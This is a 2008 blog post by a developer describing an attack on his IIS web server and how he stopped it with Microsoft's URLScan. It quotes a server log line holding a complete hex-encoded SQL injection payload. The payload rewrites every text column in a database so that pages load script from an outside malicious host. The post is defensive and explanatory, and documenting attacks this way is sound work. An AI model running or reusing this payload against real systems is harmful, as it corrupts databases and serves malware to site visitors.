Accidental Technologist

Musings about Entrepreneurship, Technology and Software Development

  • Home
  • About
  • Still River Software
  • Privacy Policy

Powered by Genesis

You are here: Home / IIS / Accessorize your Denial of Service or SQL Injection Attack

Accessorize your Denial of Service or SQL Injection Attack

August 11, 2008 by Rob Bazinet

Tweet

I was reading some posts on Twitter the past couple days and noticed some Tweets from Phil Haack and Scott Hanselman regarding an attack on their webHacked   servers for their blogs which caused a large spike in traffic.  They determined it was some type of Distributed Denial of Service (DDOS) attack.  I decided to check out my own server which I host this site and to my surprise, the same thing had been happening to me all day with an increase in traffic 10x.

I reviewed my server logs and saw some really large QueryStrings being sent which looked like this:

2008-08-08 05:51:53 W3SVC2557 SV2419 74.86.230.234 GET /asp-net/feed/ ‘;DECLARE%[email protected]%20CHAR(4000);SET%[email protected]=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F43757273
6F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756
D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E7874
7970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7220464554434
8204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920
424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C6
53E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D
272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646
F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162
6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655
F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 – 69.180.0.90 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;
+Zango+10.3.74.0) – – accidentaltechnologist.com 200 0 0 27171 1514 3328

It appears this is more of a SQL Injection attack and not just simply a DDOS.  You can see the EXEC(@S) where they are trying to execute some nasty SQL on my server.  Rick Strahl has also had some similar problems and he addresses the issue in IIS 7.0.

Not being what to do, I went to Twitter, pinged Scott to see what he did to stop the attack and he suggested URLScan from Microsoft.  Of course, this is tool I used to use back in the day of supporting clients web servers to help ward off unfriendly visitors.  I had forgotten all about this tool until Scott mentioned it.

I downloaded URLScan from Microsoft and promptly installed it on my web server and the DDOS attack stopped almost instantly.  The current version of URLScan is 2.5 which says it only works on IIS 6.0, but a beta version of URLScan 3.0 is available for IIS 5.1, 6.0, and 7.0.

Thank you Scott for the quick reply and suggestion to fix my problem.

Technorati Tags: Hackers,DDOS,URLScan,IIS,SQL Injection

Share this:

  • LinkedIn
  • Twitter
  • Facebook
  • Email
  • More
  • Pinterest
  • Tumblr
  • Pocket
  • Reddit

Related

Filed Under: IIS

Care about your privacy? I do and use Fathom Analytics on this site.

Fathom Analytics

Recent Posts

  • How to Fix Rails Flash Rendering When Using Hotwire
  • Hotwire Fix for CORS Error when using Omniauth
  • Fix Installation of Ruby using rbenv on macOS Big Sur
  • RailsConf 2021 and the Future of Conferences
  • Fixing Out of Diskspace Errors on Amazon EC2

Categories

Services I Love

HatchBox - Easy Rails Deploys Fathom Analytics
Follow @rbazinet

Rob Bazinet
@rbazinet

  • Exactly this…. https://t.co/yWj7fZ01HR
    about 16 hours ago
  • https://t.co/EmagdpLoNv "Introducing GitHub Copilot X · GitHub"
    about 1 day ago
  • RIP Gordon Moore: https://t.co/c5J9LaHrj8
    about 1 day ago
  • Our daughter works as a teaching assistant at a local K-8 public school. It’s become apparent that students today r… https://t.co/p2t912GVyc
    about 2 days ago
  • Working to wrap up my current consulting gig by mid-April. I will be looking for the next thing soon. If anyone has… https://t.co/sg3cSV9yqM
    about 3 days ago
  • RSS - Posts
  • RSS - Comments
Find me on Mastodon